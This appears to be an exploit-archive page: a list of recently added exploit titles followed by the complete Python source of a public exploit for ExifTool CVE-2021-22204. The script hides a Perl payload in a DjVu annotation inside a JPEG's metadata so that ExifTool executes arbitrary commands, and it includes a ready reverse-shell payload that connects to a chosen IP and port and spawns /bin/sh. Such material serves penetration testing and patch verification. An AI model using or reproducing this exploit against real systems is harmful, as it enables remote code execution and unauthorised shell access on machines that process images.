
42 changes to exploits/shellcodes UDisk Monitor Z5 Phone - 'MonServiceUDisk.exe' Unquoted Service Path TCQ - ITeCProteccioAppServer.exe - Unquoted Service Path Wondershare Dr.Fone 11.4.10 - Insecure File Permissions ExifTool 12.23 - Arbitrary Code Execution Wondershare Dr.Fone 12.0.7 - Privilege Escalation (ElevationService) Wondershare Dr.Fone 12.0.7 - Privilege Escalation (InstallAssistService) Prime95 Version 30.7 build 9 - Remote Code Execution (RCE) Akka HTTP 10.1.14 - Denial of Service USR IOT 4G LTE Industrial Cellular VPN Router 1.0.36 - Remote Root Backdoor Bookeen Notea - Directory Traversal SAP BusinessObjects Intelligence 4.3 - XML External Entity (XXE) ManageEngine ADSelfService Plus Build 6118 - NTLMv2 Hash Exposure DLINK DIR850 - Insecure Access Control DLINK DIR850 - Open Redirect Apache CouchDB 3.2.1 - Remote Code Execution (RCE) Tenda HG6 v3.3.0 - Remote Command Injection Google Chrome 78.0.3904.70 - Remote Code Execution PyScript - Read Remote Python Source Code DLINK DAP-1620 A1 v1.01 - Directory Traversal Ruijie Reyee Mesh Router - Remote Code Execution (RCE) (Authenticated) ImpressCMS v1.4.4 - Unrestricted File Upload Microfinance Management System 1.0 - 'customer_number' SQLi WebTareas 2.4 - Blind SQLi (Authenticated) WordPress Plugin Advanced Uploader 4.2 - Arbitrary File Upload (Authenticated) Magento eCommerce CE v2.3.5-p2 - Blind SQLi Bitrix24 - Remote Code Execution (RCE) (Authenticated) CSZ CMS 1.3.0 - 'Multiple' Blind SQLi Cyclos 4.14.7 - DOM Based Cross-Site Scripting (XSS) Cyclos 4.14.7 - 'groupId' DOM Based Cross-Site Scripting (XSS) e107 CMS v3.2.1 - Multiple Vulnerabilities Anuko Time Tracker - SQLi (Authenticated) TLR-2005KSH - Arbitrary File Upload Explore CMS 1.0 - SQL Injection Navigate CMS 2.9.4 - Server-Side Request Forgery (SSRF) (Authenticated) PHProjekt PhpSimplyGest v1.3. - Stored Cross-Site Scripting (XSS) Beehive Forum - Account Takeover MyBB 1.8.29 - MyBB 1.8.29 - Remote Code Execution (RCE) (Authenticated) WordPress Plugin Blue Admin 21.06.01 - Cross-Site Request Forgery (CSRF) Joomla Plugin SexyPolling 2.1.7 - SQLi WordPress Plugin stafflist 3.1.2 - SQLi (Authenticated)
141 lines
No EOL
4.6 KiB
Python
Executable file
141 lines
No EOL
4.6 KiB
Python
Executable file
# Exploit Title: ExifTool 12.23 - Arbitrary Code Execution
|
|
# Date: 04/30/2022
|
|
# Exploit Author: UNICORD (NicPWNs & Dev-Yeoj)
|
|
# Vendor Homepage: https://exiftool.org/
|
|
# Software Link: https://github.com/exiftool/exiftool/archive/refs/tags/12.23.zip
|
|
# Version: 7.44-12.23
|
|
# Tested on: ExifTool 12.23 (Debian)
|
|
# CVE: CVE-2021-22204
|
|
# Source: https://github.com/UNICORDev/exploit-CVE-2021-22204
|
|
# Description: Improper neutralization of user data in the DjVu file format in ExifTool versions 7.44 and up allows arbitrary code execution when parsing the malicious image
|
|
|
|
#!/usr/bin/env python3
|
|
|
|
# Imports
|
|
import base64
|
|
import os
|
|
import subprocess
|
|
import sys
|
|
|
|
# Class for colors
|
|
class color:
|
|
red = '\033[91m'
|
|
gold = '\033[93m'
|
|
blue = '\033[36m'
|
|
green = '\033[92m'
|
|
no = '\033[0m'
|
|
|
|
# Print UNICORD ASCII Art
|
|
def UNICORD_ASCII():
|
|
print(rf"""
|
|
{color.red} _ __,~~~{color.gold}/{color.red}_{color.no} {color.blue}__ ___ _______________ ___ ___{color.no}
|
|
{color.red} ,~~`( )_( )-\| {color.blue}/ / / / |/ / _/ ___/ __ \/ _ \/ _ \{color.no}
|
|
{color.red} |/| `--. {color.blue}/ /_/ / // // /__/ /_/ / , _/ // /{color.no}
|
|
{color.green}_V__v___{color.red}!{color.green}_{color.red}!{color.green}__{color.red}!{color.green}_____V____{color.blue}\____/_/|_/___/\___/\____/_/|_/____/{color.green}....{color.no}
|
|
""")
|
|
|
|
# Print exploit help menu
|
|
def help():
|
|
print(r"""UNICORD Exploit for CVE-2021-22204
|
|
|
|
Usage:
|
|
python3 exploit-CVE-2021-22204.py -c <command>
|
|
python3 exploit-CVE-2021-22204.py -s <local-IP> <local-port>
|
|
python3 exploit-CVE-2021-22204.py -c <command> [-i <image.jpg>]
|
|
python3 exploit-CVE-2021-22204.py -s <local-IP> <local-port> [-i <image.jpg>]
|
|
python3 exploit-CVE-2021-22204.py -h
|
|
|
|
Options:
|
|
-c Custom command mode. Provide command to execute.
|
|
-s Reverse shell mode. Provide local IP and port.
|
|
-i Path to custom JPEG image. (Optional)
|
|
-h Show this help menu.
|
|
""")
|
|
|
|
# Run the exploit
|
|
def exploit(command):
|
|
|
|
UNICORD_ASCII()
|
|
|
|
# Create perl payload
|
|
payload = "(metadata \"\c${"
|
|
payload += command
|
|
payload += "};\")"
|
|
|
|
print(f"{color.red}RUNNING: {color.blue}UNICORD Exploit for CVE-2021-22204{color.no}")
|
|
print(f"{color.red}PAYLOAD: {color.gold}" + payload + f"{color.no}")
|
|
|
|
# Write payload to file
|
|
payloadFile = open('payload','w')
|
|
payloadFile.write(payload)
|
|
payloadFile.close()
|
|
|
|
# Bzz compress file
|
|
subprocess.run(['bzz', 'payload', 'payload.bzz'])
|
|
|
|
# Run djvumake
|
|
subprocess.run(['djvumake', 'exploit.djvu', "INFO=1,1", 'BGjp=/dev/null', 'ANTz=payload.bzz'])
|
|
|
|
if '-i' in sys.argv:
|
|
imagePath = sys.argv[sys.argv.index('-i') + 1]
|
|
subprocess.run(['cp',f'{imagePath}','./image.jpg','-n'])
|
|
|
|
else:
|
|
# Smallest possible JPEG
|
|
image = b"/9j/4AAQSkZJRgABAQEASABIAAD/2wBDAAMCAgICAgMCAgIDAwMDBAYEBAQEBAgGBgUGCQgKCgkICQkKDA8MCgsOCwkJDRENDg8QEBEQCgwSExIQEw8QEBD/yQALCAABAAEBAREA/8wABgAQEAX/2gAIAQEAAD8A0s8g/9k="
|
|
|
|
# Write smallest possible JPEG image to file
|
|
with open("image.jpg", "wb") as img:
|
|
img.write(base64.decodebytes(image))
|
|
|
|
# Write exiftool config to file
|
|
config = (r"""
|
|
%Image::ExifTool::UserDefined = (
|
|
'Image::ExifTool::Exif::Main' => {
|
|
0xc51b => {
|
|
Name => 'HasselbladExif',
|
|
Writable => 'string',
|
|
WriteGroup => 'IFD0',
|
|
},
|
|
},
|
|
);
|
|
1; #end
|
|
""")
|
|
configFile = open('exiftool.config','w')
|
|
configFile.write(config)
|
|
configFile.close()
|
|
|
|
# Exiftool config for output image
|
|
subprocess.run(['exiftool','-config','exiftool.config','-HasselbladExif<=exploit.djvu','image.jpg','-overwrite_original_in_place','-q'])
|
|
|
|
# Delete leftover files
|
|
os.remove("payload")
|
|
os.remove("payload.bzz")
|
|
os.remove("exploit.djvu")
|
|
os.remove("exiftool.config")
|
|
|
|
# Print results
|
|
print(f"{color.red}RUNTIME: {color.green}DONE - Exploit image written to 'image.jpg'{color.no}\n")
|
|
|
|
exit()
|
|
|
|
if __name__ == "__main__":
|
|
|
|
args = ['-h','-c','-s','-i']
|
|
|
|
if args[0] in sys.argv:
|
|
help()
|
|
|
|
elif args[1] in sys.argv and not args[2] in sys.argv:
|
|
exec = sys.argv[sys.argv.index(args[1]) + 1]
|
|
command = f"system(\'{exec}\')"
|
|
exploit(command)
|
|
|
|
elif args[2] in sys.argv and not args[1] in sys.argv:
|
|
localIP = sys.argv[sys.argv.index(args[2]) + 1]
|
|
localPort = sys.argv[sys.argv.index(args[2]) + 2]
|
|
command = f"use Socket;socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp'));if(connect(S,sockaddr_in({localPort},inet_aton('{localIP}')))){{open(STDIN,'>&S');open(STDOUT,'>&S');open(STDERR,'>&S');exec('/bin/sh -i');}};"
|
|
exploit(command)
|
|
|
|
else:
|
|
help() |